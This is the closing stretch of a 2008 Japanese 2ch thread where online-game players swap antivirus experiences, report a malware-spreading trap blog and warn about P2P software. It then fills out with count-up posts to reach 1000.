ひとまずニィと洒落は捨てて、バスターの期限切れたらカスペに乗り換えることにします


980 :既にその名前は使われています:2008/04/18(金) 21:25:41.36 ID:D1oPEge2
セキュリティソフトをバスターからカスペに乗り換えた。
デフォルト設定では、FFにキャラログインして1分くらいでいつも異常終了した。
ネットで調べて、「設定」>プロテクション>互換モード をOnにすれば落ちなくなった。
でも、この「互換モード」って、そもそも何の「互換」なんだ?!

981 :既にその名前は使われています:2008/04/18(金) 21:26:17.12 ID:RYkZkaFi
つーことは結局ウイルスは0ってことじゃねぇの?wそれって

982 :既にその名前は使われています:2008/04/18(金) 21:32:34.23 ID:iZ0az2ny
>>981
俺もそう思うw

983 :既にその名前は使われています:2008/04/18(金) 21:35:00.10 ID:z4+3qTaR
FFインスコしてるPCにニィと洒落もインスコなんて怖すぎてできねー

984 :既にその名前は使われています:2008/04/18(金) 21:35:36.70 ID:D1oPEge2
このシリーズのスレ2月からずっと見てるが、バスターで検地したウィルス、
隔離したまま、消してない人、意外に多いんだな。

985 :既にその名前は使われています:2008/04/18(金) 21:37:32.78 ID:FmkM+Xp3
FFとニィと酒落が一緒ってこのスレ以前の問題だわな

986 :既にその名前は使われています:2008/04/18(金) 21:40:09.74 ID:D1oPEge2
せめて、VIrtualPCか、VM Ware の中でやってくれ>ニィ、洒落

987 :既にその名前は使われています:2008/04/18(金) 22:18:15.59 ID:caXnhLX9
>>965
閲覧者視点だとそれほど問題にはならないけど、web制作者視点だと、w3c非準拠だらけのIE6を基準にしているようでは、
ユニバーサルなサイト設計とは言いがたい部分がある。
それと、IE7はbuggyでクラッシュし易いし、早速IE8へのロードプランが持ち上がってきている。
Vista同様に、過渡期の副産物で終わってしまうかもしれない。

988 :既にその名前は使われています:2008/04/18(金) 22:46:59.64 ID:4aZaOUb3
また中国IPからブログコメント来てたので報告。
http://yaplog●jp/tshshow/
ちなみにFc2ブログからのパクリだった

>>984
バスター入れてるんだけど隔離したものが消せない状態になったので
バスターのプログラム全部ををバスターの隔離ファイルごと面倒くさく
なって丸消ししましたよ。困った時の初心者にオススメ!


989 :既にその名前は使われています:2008/04/18(金) 22:51:24.29 ID:v4gnUKOD
>>986
最近は仮想マシンからホストを乗っ取るウィルスがあってな


990 :既にその名前は使われています:2008/04/18(金) 23:35:14.08 ID:ToQ4N9Dk
988のblog見てきた。
確かにblog名はfc2にある所のパクリ。
記事はblog名とは別の所からのパクリ。

んで、今までの罠blog同様こちらも色んな所でblogの宣伝してるみたい。
ただ今回の罠blogは記事が書いてあって、SSもあって、
さらにコメントまで最初に仕込んであるからか、誘導されて見に来た
疑惑を持たない人が書き込み返ししてるぽい。

感染者増えてる気がするな・・・。

991 :既にその名前は使われています:2008/04/18(金) 23:39:38.35 ID:ToQ4N9Dk
スレたててきた。

●● RMT業者の垢ハックが多発している件18 ●●
http://live27.2ch.net/test/read.cgi/ogame/1208529476/

992 :既にその名前は使われています:2008/04/18(金) 23:47:47.76 ID:5c2U8e6u
>>991

さあ、おまいら埋める時間だぞ

993 :既にその名前は使われています:2008/04/18(金) 23:49:34.06 ID:z4+3qTaR
はあああああああああああ!!はああああああああああ!!黙想!!

994 :既にその名前は使われています:2008/04/18(金) 23:51:48.32 ID:5c2U8e6u
994

995 :既にその名前は使われています:2008/04/18(金) 23:55:09.05 ID:5c2U8e6u
995

996 :既にその名前は使われています:2008/04/18(金) 23:57:49.51 ID:5c2U8e6u
996

997 :既にその名前は使われています:2008/04/18(金) 23:58:59.57 ID:5c2U8e6u
997

998 :既にその名前は使われています:2008/04/18(金) 23:59:10.11 ID:5c2U8e6u
998

999 :既にその名前は使われています:2008/04/18(金) 23:59:28.74 ID:5c2U8e6u
999

1000 :既にその名前は使われています:2008/04/18(金) 23:59:39.42 ID:5c2U8e6u
1000ならチベット独立!

1001 :1001:Over 1000 Thread
  === Area: Live Networkgames@2ch http://live27.2ch.net/ogame/ ===

      //
    / .人      あ、ぽこたんインできないお!
    /  (__) パカ
   / ∩(____)       このスレッドは1000を超えたお。。。
   / .|( ・∀・)_       もう書けないので、新しいスレッドにインするお!
  // |   ヽ/
  " ̄ ̄ ̄"∪


271 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50


read.cgi ver 05.05 2022/08/31 Walang Kapalit ★
FOX ★